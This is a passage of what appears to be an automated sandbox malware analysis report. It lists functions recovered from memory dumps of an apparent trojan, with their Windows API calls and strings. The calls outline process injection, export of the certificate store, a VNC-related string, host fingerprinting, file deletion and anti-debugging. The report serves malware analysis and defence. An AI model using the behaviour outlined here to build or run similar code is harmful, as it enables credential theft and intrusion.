Part of subcall function 00C52917: WSAEventSelect.WS2_32(?,?,00C52CD1), ref: 00C52943
Part of subcall function 00C52917: WSACloseEvent.WS2_32(?), ref: 00C52957

Part of subcall function 00C52855: getsockopt.WS2_32(0000EA60,0000FFFF,00002004,?,?), ref: 00C5288F
Part of subcall function 00C52855: memset.MSVCRT ref: 00C528A3

WSAGetLastError.WS2_32(00000023,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00C2D163,?), ref: 00C52D6F
shutdown.WS2_32(?,00000002), ref: 00C52D87
closesocket.WS2_32 ref: 00C52D8E

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351DFC6, Relevance: 10.7, APIs: 7, Instructions: 195

APIs

GetStartupInfoW.KERNEL32(?), ref: 0351DFD1

Part of subcall function 0351FF25: Sleep.KERNEL32(00000000), ref: 0351FF4D

GetFileType.KERNEL32 ref: 0351E104
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 0351E13A
GetStdHandle.KERNEL32 ref: 0351E18E
GetFileType.KERNEL32 ref: 0351E1A0
InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 0351E1CE
SetHandleCount.KERNEL32 ref: 0351E1F7

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 00C36378, Relevance: 10.6, APIs: 7, Instructions: 146

APIs

Part of subcall function 00C3568C: TlsSetValue.KERNEL32(00000001,00C554A7), ref: 00C35699

Part of subcall function 00C4BEE3: CreateMutexW.KERNEL32(00C62974,00000000,?), ref: 00C4BF05

GetCurrentThread.KERNEL32 ref: 00C363A4
SetThreadPriority.KERNEL32 ref: 00C363AB

Part of subcall function 00C44B8D: WaitForSingleObject.KERNEL32(00000000,00C554CE), ref: 00C44B95

memset.MSVCRT ref: 00C363ED
lstrlenA.KERNEL32(00000050), ref: 00C36404

Part of subcall function 00C35D25: memset.MSVCRT ref: 00C35D35

Part of subcall function 00C40A9A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C40AD8
Part of subcall function 00C40A9A: PathRemoveFileSpecW.SHLWAPI(?), ref: 00C40B26
Part of subcall function 00C40A9A: FindFirstFileW.KERNEL32(?,?), ref: 00C40B93
Part of subcall function 00C40A9A: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00C40BEA
Part of subcall function 00C40A9A: SetLastError.KERNEL32(00000057,?), ref: 00C40C5B
Part of subcall function 00C40A9A: CloseHandle.KERNEL32 ref: 00C40C95
Part of subcall function 00C40A9A: FindNextFileW.KERNEL32(?,?), ref: 00C40CC9
Part of subcall function 00C40A9A: FindClose.KERNEL32 ref: 00C40CF3

memset.MSVCRT ref: 00C364CA
memcpy.MSVCRT ref: 00C364DA

Part of subcall function 00C36240: lstrlenA.KERNEL32(?,?), ref: 00C36279
Part of subcall function 00C36240: CreateMutexW.KERNEL32(00C62974,00000001,?), ref: 00C362D1
Part of subcall function 00C36240: GetLastError.KERNEL32(?,?,?,?), ref: 00C362E1
Part of subcall function 00C36240: CloseHandle.KERNEL32 ref: 00C362EF
Part of subcall function 00C36240: memcpy.MSVCRT ref: 00C36319
Part of subcall function 00C36240: memcpy.MSVCRT ref: 00C3632D

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

WaitForSingleObject.KERNEL32(00007530), ref: 00C36504

Part of subcall function 00C32FB7: ReleaseMutex.KERNEL32 ref: 00C32FBB
Part of subcall function 00C32FB7: CloseHandle.KERNEL32 ref: 00C32FC2

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3DEBB, Relevance: 10.6, APIs: 3, Strings: 2, Instructions: 27

APIs

GetModuleHandleW.KERNEL32(shell32.dll), ref: 00C3DEC9
GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00C3DED5
SetLastError.KERNEL32(00000001,00C442C8,00C62954,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C3DEED

Strings

shell32.dll, xrefs: 00C3DEC8
SHGetKnownFolderPath, xrefs: 00C3DED3

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C379B9, Relevance: 10.6, APIs: 7, Instructions: 126

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00C379F0
WSASetLastError.WS2_32(00000008), ref: 00C379FF
memcpy.MSVCRT ref: 00C37A1C
memcpy.MSVCRT ref: 00C37A2E
WSASetLastError.WS2_32(00000008,?,?,?), ref: 00C37A98
WSAGetLastError.WS2_32(?,?,?), ref: 00C37AB4

Part of subcall function 00C37CDE: InterlockedIncrement.KERNEL32(?,?,00000000), ref: 00C37D2F
Part of subcall function 00C37CDE: RegisterWaitForSingleObject.KERNEL32(?,?,00C37B1D,?,000000FF,00000004), ref: 00C37D43

WSASetLastError.WS2_32(00000008,?,?,?,?,?,?,?), ref: 00C37ADD

Part of subcall function 00C2F9C5: memcpy.MSVCRT ref: 00C2F9DA
Part of subcall function 00C2F9C5: SetEvent.KERNEL32 ref: 00C2F9EA

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C35208, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60

APIs

memset.MSVCRT ref: 00C35229
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,?,?,?), ref: 00C35261
memcpy.MSVCRT ref: 00C3527C
CloseHandle.KERNEL32(?), ref: 00C35291
CloseHandle.KERNEL32(?), ref: 00C35297

Strings

D, xrefs: 00C35232

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C39895, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49

APIs

CloseHandle.KERNEL32 ref: 00C3989F
GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C398AD

Part of subcall function 00C2E6AF: GetFileAttributesW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data), ref: 00C2E6BC
Part of subcall function 00C2E6AF: CreateFileW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data,80000000,00000007,00000000,00000003,?,00000000), ref: 00C2E6DC

memcpy.MSVCRT ref: 00C398E8
lstrcpyW.KERNEL32(?,?), ref: 00C398FD

Part of subcall function 00C4B9D8: PathIsDirectoryW.SHLWAPI(?), ref: 00C4BA0E
Part of subcall function 00C4B9D8: CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000003,02000000,00000000), ref: 00C4BA30
Part of subcall function 00C4B9D8: GetFileTime.KERNEL32(?,?,00000000,00000000), ref: 00C4BA76
Part of subcall function 00C4B9D8: CloseHandle.KERNEL32 ref: 00C4BA95
Part of subcall function 00C4B9D8: PathRemoveFileSpecW.SHLWAPI ref: 00C4BAA2

CloseHandle.KERNEL32 ref: 00C39916

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C398B3

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2A5B2, Relevance: 10.5, APIs: 4, Strings: 1, Instructions: 293

APIs

Part of subcall function 00C4BEE3: CreateMutexW.KERNEL32(00C62974,00000000,?), ref: 00C4BF05

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

Part of subcall function 00C31B16: CreateFileW.KERNEL32(00F41EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C31B2F
Part of subcall function 00C31B16: GetFileSizeEx.KERNEL32(?,?), ref: 00C31B42
Part of subcall function 00C31B16: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00C31B68
Part of subcall function 00C31B16: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00C31B80
Part of subcall function 00C31B16: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C31B9E
Part of subcall function 00C31B16: CloseHandle.KERNEL32 ref: 00C31BA7

memset.MSVCRT ref: 00C2A757
memcpy.MSVCRT ref: 00C2A780

Part of subcall function 00C4D95F: GetSystemTime.KERNEL32(?), ref: 00C4D969

Part of subcall function 00C369C9: HeapAlloc.KERNEL32(00000000,?,?,00C54E9D,00C29851,?,?,00C54FB1,?,?,?,?,?,?,?,?), ref: 00C369F3
Part of subcall function 00C369C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00C54E9D,00C29851,?,?,00C54FB1,?,?,?,?,?,?), ref: 00C36A06

Part of subcall function 00C53993: memcpy.MSVCRT ref: 00C53AA4

CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00C2A885
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C2A8A1

Part of subcall function 00C2E348: CloseHandle.KERNEL32 ref: 00C2E354

Part of subcall function 00C32FB7: ReleaseMutex.KERNEL32 ref: 00C32FBB
Part of subcall function 00C32FB7: CloseHandle.KERNEL32 ref: 00C32FC2

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C2A46D: memset.MSVCRT ref: 00C2A47C
Part of subcall function 00C2A46D: memset.MSVCRT ref: 00C2A4BF
Part of subcall function 00C2A46D: memset.MSVCRT ref: 00C2A4F5

Part of subcall function 00C31149: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C31158

Part of subcall function 00C30C35: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00C30C9B
Part of subcall function 00C30C35: memcpy.MSVCRT ref: 00C30CB5
Part of subcall function 00C30C35: VirtualProtect.KERNEL32(?,?,00000002,-00000048), ref: 00C30CC8
Part of subcall function 00C30C35: memset.MSVCRT ref: 00C30D1F
Part of subcall function 00C30C35: memcpy.MSVCRT ref: 00C30D33
Part of subcall function 00C30C35: VirtualProtect.KERNEL32(?,?,?,-00000048), ref: 00C30E22

Part of subcall function 00C53B9E: memcmp.MSVCRT ref: 00C53C47

Part of subcall function 00C31BB5: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C31BC6
Part of subcall function 00C31BB5: CloseHandle.KERNEL32 ref: 00C31BD5

Strings

vnc, xrefs: 00C2A601 00C2A60E

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C55419, Relevance: 10.2, APIs: 3, Strings: 2, Instructions: 46

APIs

LoadLibraryW.KERNEL32(urlmon.dll), ref: 00C55420
GetProcAddress.KERNEL32(?,ObtainUserAgentString), ref: 00C55436
FreeLibrary.KERNEL32 ref: 00C55481

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Strings

urlmon.dll, xrefs: 00C5541B
ObtainUserAgentString, xrefs: 00C5542E

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3DEFC, Relevance: 10.2, APIs: 3, Strings: 2, Instructions: 40

APIs

EnterCriticalSection.KERNEL32(00C63510,?,00000000,?,00C44659,?,00C449A5,?,?,00000001), ref: 00C3DF10
LeaveCriticalSection.KERNEL32(00C63510,?,00000000,?,00C44659,?,00C449A5,?,?,00000001), ref: 00C3DF38

Part of subcall function 00C3DEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 00C3DEC9
Part of subcall function 00C3DEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00C3DED5
Part of subcall function 00C3DEBB: SetLastError.KERNEL32(00000001,00C442C8,00C62954,?,00C62DB4,00000000,00000006,?,00C4BBC2,00C62DB4,?,?,00000000), ref: 00C3DEED

IsWow64Process.KERNEL32(000000FF,?), ref: 00C3DF61

Strings

IsWow64Process, xrefs: 00C3DF44
kernel32.dll, xrefs: 00C3DF49

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351F662, Relevance: 10.0, APIs: 5, Instructions: 58

APIs

IsDebuggerPresent.KERNEL32 ref: 0352098D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 035209A2
UnhandledExceptionFilter.KERNEL32(0353E630), ref: 035209AD
GetCurrentProcess.KERNEL32 ref: 035209C9
TerminateProcess.KERNEL32 ref: 035209D0

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 00C36997, Relevance: 9.6, APIs: 1, Instructions: 9

APIs

Part of subcall function 00C3692C: EnterCriticalSection.KERNEL32(00C63510,00000024,00C3699F,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C3693C
Part of subcall function 00C3692C: LeaveCriticalSection.KERNEL32(00C63510,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C36966

HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C43C8C, Relevance: 9.6, APIs: 5, Instructions: 138

APIs

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

FindFirstFileW.KERNEL32(?,?), ref: 00C43CCB
SetLastError.KERNEL32(?,?,?,?), ref: 00C43DF6

Part of subcall function 00C43E6B: PathMatchSpecW.SHLWAPI(00000010), ref: 00C43E98
Part of subcall function 00C43E6B: PathMatchSpecW.SHLWAPI(00000010), ref: 00C43EB7

FindNextFileW.KERNEL32(?,?), ref: 00C43DC0
GetLastError.KERNEL32(?,?), ref: 00C43DD9
FindClose.KERNEL32 ref: 00C43DEF

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2DE64, Relevance: 9.5, APIs: 6, Instructions: 88

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00C2E138,?,?,?,?,?,00000009,00000000), ref: 00C2DE7E
LeaveCriticalSection.KERNEL32 ref: 00C2DF65

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

memcpy.MSVCRT ref: 00C2DEEF
memcpy.MSVCRT ref: 00C2DF13
memcpy.MSVCRT ref: 00C2DF2A
memcpy.MSVCRT ref: 00C2DF4A

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C530A2, Relevance: 9.5, APIs: 5, Instructions: 71

APIs

Part of subcall function 00C52755: EnterCriticalSection.KERNEL32(Function_00043510,?,00C530AF,?,?,00000000), ref: 00C52765
Part of subcall function 00C52755: LeaveCriticalSection.KERNEL32(Function_00043510,?,00000000), ref: 00C5278F

socket.WS2_32(?,00000002,00000000), ref: 00C530BC
WSAIoctl.WS2_32(?,48000016,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00C530EF
WSAGetLastError.WS2_32(?,48000016,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 00C530F6

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

WSAIoctl.WS2_32(?,48000016,00000000,00000000,?,?,?,00000000,00000000), ref: 00C5312A

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

closesocket.WS2_32 ref: 00C5313A

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C444FB, Relevance: 9.5, APIs: 5, Instructions: 59

APIs

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

FindFirstFileW.KERNEL32(?,?), ref: 00C4452C

Part of subcall function 00C2E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
Part of subcall function 00C2E826: DeleteFileW.KERNEL32(?), ref: 00C2E836

FindNextFileW.KERNEL32(?,?), ref: 00C4457E
FindClose.KERNEL32 ref: 00C44589
SetFileAttributesW.KERNEL32(?,00000080), ref: 00C44595
RemoveDirectoryW.KERNEL32(?), ref: 00C4459C

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C44A6B, Relevance: 9.4, APIs: 5, Instructions: 109

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00C44A89

Part of subcall function 00C44159: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00C44188
Part of subcall function 00C44159: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00C441C7
Part of subcall function 00C44159: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C441EE

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00C44AC4
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C44B04
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C44B27

Part of subcall function 00C445AE: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00C445D1
Part of subcall function 00C445AE: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C445E9
Part of subcall function 00C445AE: DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000001), ref: 00C44604

VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C44B77

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4B70A, Relevance: 9.4, APIs: 5, Instructions: 89

APIs

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

CreateDirectoryW.KERNEL32(?,00000000), ref: 00C4B783
SetFileAttributesW.KERNEL32(?), ref: 00C4B7A2
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,?,00000000), ref: 00C4B7B9
GetLastError.KERNEL32(?,00000002,?,?), ref: 00C4B7C6
CloseHandle.KERNEL32 ref: 00C4B7FF

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 035209D8, Relevance: 9.2, APIs: 6, Instructions: 190

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 03520A49
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?), ref: 03520AB7
LCMapStringW.KERNEL32(00000000,?,00000000,?,00000000,00000000), ref: 03520AD3
LCMapStringW.KERNEL32(00000000,?,00000000,?,?), ref: 03520B0C

Part of subcall function 03520D2C: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0351FEF1,?,00000001,?,?,0351EAC5,00000018,0353EF58,0000000C,0351EB55), ref: 03520D71

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 03520B72
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 03520B91

Part of subcall function 0351F662: IsDebuggerPresent.KERNEL32 ref: 0352098D
Part of subcall function 0351F662: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 035209A2
Part of subcall function 0351F662: UnhandledExceptionFilter.KERNEL32(0353E630), ref: 035209AD
Part of subcall function 0351F662: GetCurrentProcess.KERNEL32 ref: 035209C9
Part of subcall function 0351F662: TerminateProcess.KERNEL32 ref: 035209D0

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 00C35C67, Relevance: 9.1, APIs: 5, Instructions: 49

APIs

EnterCriticalSection.KERNEL32(00F421E4,?,?,00000001,00C44EA8,?,?,00000001), ref: 00C35C70
LeaveCriticalSection.KERNEL32(00F421E4,?,00000001,00C44EA8,?,?,00000001), ref: 00C35C7A
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00C35CA0
EnterCriticalSection.KERNEL32(00F421E4,?,00000001,00C44EA8,?,?,00000001), ref: 00C35CB8
LeaveCriticalSection.KERNEL32(00F421E4,?,00000001,00C44EA8,?,?,00000001), ref: 00C35CC2

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C349D7, Relevance: 9.1, APIs: 6, Instructions: 145

APIs

memset.MSVCRT ref: 00C34A18

Part of subcall function 00C53D5A: memcpy.MSVCRT ref: 00C53D94

CharLowerW.USER32 ref: 00C34A5C
CharUpperW.USER32(?,?,00000001), ref: 00C34A6D
CharLowerW.USER32 ref: 00C34A81
CharUpperW.USER32(?,00000001), ref: 00C34A8B
memcmp.MSVCRT ref: 00C34AA0

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C37B1D, Relevance: 9.1, APIs: 6, Instructions: 141

APIs

Part of subcall function 00C3568C: TlsSetValue.KERNEL32(00000001,00C554A7), ref: 00C35699

Part of subcall function 00C2F99C: ResetEvent.KERNEL32 ref: 00C2F9B8

WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00C37B63
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00C37B6D
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00C37C76
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00C37C7F
UnregisterWait.KERNEL32(?), ref: 00C37CA4
TlsSetValue.KERNEL32(00000000), ref: 00C37CCF

Part of subcall function 00C2F9C5: memcpy.MSVCRT ref: 00C2F9DA
Part of subcall function 00C2F9C5: SetEvent.KERNEL32 ref: 00C2F9EA

Part of subcall function 00C2F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00C2F82D

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4BC3E, Relevance: 9.1, APIs: 5, Instructions: 172

APIs

memset.MSVCRT ref: 00C4BC73
GetComputerNameW.KERNEL32(?,?), ref: 00C4BCA7
GetVersionExW.KERNEL32(?), ref: 00C4BCD0
memset.MSVCRT ref: 00C4BCEF

Part of subcall function 00C40D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00C40D60

Part of subcall function 00C40D19: RegFlushKey.ADVAPI32 ref: 00C40D29
Part of subcall function 00C40D19: RegCloseKey.ADVAPI32 ref: 00C40D31

Part of subcall function 00C29A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00C29ACA
Part of subcall function 00C29A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00C29AEF

memset.MSVCRT ref: 00C4BDF4

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C29A2A: CryptDestroyHash.ADVAPI32 ref: 00C29A42
Part of subcall function 00C29A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00C29A53

Part of subcall function 00C29B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00C29B41

Part of subcall function 00C40FD5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00C4BD4B,?), ref: 00C40FF2

Part of subcall function 00C40E64: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C40EBF

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C324AA, Relevance: 9.1, APIs: 6, Instructions: 91

APIs

CertOpenSystemStoreW.CRYPT32(00000000), ref: 00C324BC
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00C324DA
CertEnumCertificatesInStore.CRYPT32(?,?,?,00000000), ref: 00C324E7
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,?,?,00000000), ref: 00C3251B

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,?,?,00000000,00000004,?,?,?,00000000), ref: 00C3254D

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C3258C: GetUserNameExW.SECUR32(00000002,?,?,00000001,?,00000000), ref: 00C325BA
Part of subcall function 00C3258C: GetSystemTime.KERNEL32(?), ref: 00C3260D
Part of subcall function 00C3258C: CharLowerW.USER32(?), ref: 00C3265D
Part of subcall function 00C3258C: PathRenameExtensionW.SHLWAPI(?,?), ref: 00C3268D

CertCloseStore.CRYPT32(?,00000000,?,00000000), ref: 00C3257C

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3D694, Relevance: 9.1, APIs: 6, Instructions: 79

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000004,00C3D7B9,00000000,?,?,?,?,?,?,00C3C499,?,00000000), ref: 00C3D69E
HeapCreate.KERNEL32(00040001,00000000,00000000), ref: 00C3D6DB
HeapAlloc.KERNEL32(?,00000000,0000000B,?,?,?,?,00000004,00C3D7B9,00000000), ref: 00C3D6F8
HeapFree.KERNEL32(?,00000000,?,?,00000000,0000000B,?,?,?,?,00000004,00C3D7B9,00000000), ref: 00C3D720
memcpy.MSVCRT ref: 00C3D730

Part of subcall function 00C3599B: EnterCriticalSection.KERNEL32(00C627DC,00000000,00C2D9CE,00F41E90,?,?,?,00C31992,?,?,?,?,00C448EB,?,?,00000000), ref: 00C359A7
Part of subcall function 00C3599B: LeaveCriticalSection.KERNEL32(00C627DC,?,?,?,00C31992,?,?,?,?,00C448EB,?,?,00000000), ref: 00C359B7

Part of subcall function 00C309C2: GetCurrentThreadId.KERNEL32 ref: 00C309D3
Part of subcall function 00C309C2: memcpy.MSVCRT ref: 00C30B42
Part of subcall function 00C309C2: memset.MSVCRT ref: 00C30BA8
Part of subcall function 00C309C2: VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00C30BBD
Part of subcall function 00C309C2: GetLastError.KERNEL32(?,00000040,?,?,?,00000000), ref: 00C30BC7

Part of subcall function 00C359C5: LeaveCriticalSection.KERNEL32(00C627DC,00C35A45,00000002,?,?,?,00C2DAA2,00000002,00000001,000000FF), ref: 00C359CF

Part of subcall function 00C359D6: LeaveCriticalSection.KERNEL32(00C627DC,?,00C2D9F7,00000009,00F41E90,?,?,?,00C31992,?,?,?,?,00C448EB), ref: 00C359E3

LeaveCriticalSection.KERNEL32(?,?,00000000,0000000B,?,?,?,?,00000004,00C3D7B9,00000000), ref: 00C3D774

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C55BA7, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 72

APIs

lstrcmpA.KERNEL32(?,?\C), ref: 00C55BC4
lstrcpyW.KERNEL32(00C5597D), ref: 00C55BD6
lstrcmpA.KERNEL32(?,00C2939C), ref: 00C55BE9
StrCmpNA.SHLWAPI(?,00C29394,00000002), ref: 00C55BFF
